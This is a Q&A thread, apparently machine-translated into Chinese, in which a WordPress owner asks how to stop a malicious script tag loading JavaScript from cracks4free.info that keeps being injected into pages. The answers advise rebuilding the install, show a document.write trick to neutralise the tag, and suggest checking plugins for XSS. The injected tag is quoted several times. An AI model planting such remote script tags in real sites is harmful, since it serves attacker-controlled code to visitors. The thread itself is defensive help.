防止惡意軟件javascript執行

Question

我正在使用wordpress網站，並且我發現了惡意軟件腳本，每當我嘗試保存頁面並單擊所見即所得中的文本面板時，惡意軟件的javascript標記都會自動添加到頁面中。這裏是自動添加的腳本。

<script type="text/javascript" src="http://cracks4free.info/5/adds.js" async=""></script> 

我試圖通過下面的代碼刪除src文件。但它不起作用，該腳本在body標籤關閉之前最後執行。我試過使用這個腳本，但惡意軟件腳本在所有的JavaScript加載後加載。這是我的代碼。

<script type="text/javascript"> 
$("script[src='http://cracks4free.info/5/adds.js']").remove() 
</script> 

我需要刪除該代碼，或阻止這種代碼通過javasript，jQuery的AJAX任何執行..只是想擺脫這一點。由於

Answer 1

如果您的服務器被入侵，你需要重建它：

1. 出口現有的內容
2. 重建盒與最新的WordPress版本
3. 導入您的內容
4. 定期應用安全更新

試圖使用JavaScript清理內容不是一個解決方案。你有一個妥協的WordPress的安裝，這是一個其他腳本kiddy添加自己的個人風格的時間問題，或發生更糟糕的事情。

Answer 2

您可以將惡意腳本之前權注入新的腳本標籤開始通過JavaScript執行：基本上這裏

document.write("<script type='application/x-suppress'>"); 

你開始一個新的<script>塊，但沒有完成它，假設接下來要做的是偏偏就是惡意軟件插入它的塊在最後

<script type="text/javascript" src="http://cracks4free.info/5/adds.js" async=""></script> 

最終的結果最終會被

<script type='application/x-suppress'><script type="text/javascript" src="http://cracks4free.info/5/adds.js" async=""></script> 

會發生什麼事是瀏覽器會看到第一個<script>標籤，並期望其中的所有內容都是JavaScript代碼。當它試圖解析腳本（<script type="text/javascript" src="http://cracks4free.info/5/adds.js" async="">）時，它會導致JavaScript解析錯誤，而不會執行任何操作。最後，您的<script>區塊將通過您的惡意軟件提供的</script>關閉。

真正的問題是，爲什麼你有這個惡意軟件，你怎麼能擺脫它？而不是試圖解決它。

Answer 3

看起來像你的一個WordPress插件可以用於XSS（跨站腳本），我建議你掃描一下這個插件的漏洞。 您可以自己掃描插件的源代碼，以便盲目向用戶返回javascript，但不會正確轉義它。

你應該遵循Hamish的建議，我的建議只是包含在這裏，所以你不會重新安裝有問題的插件。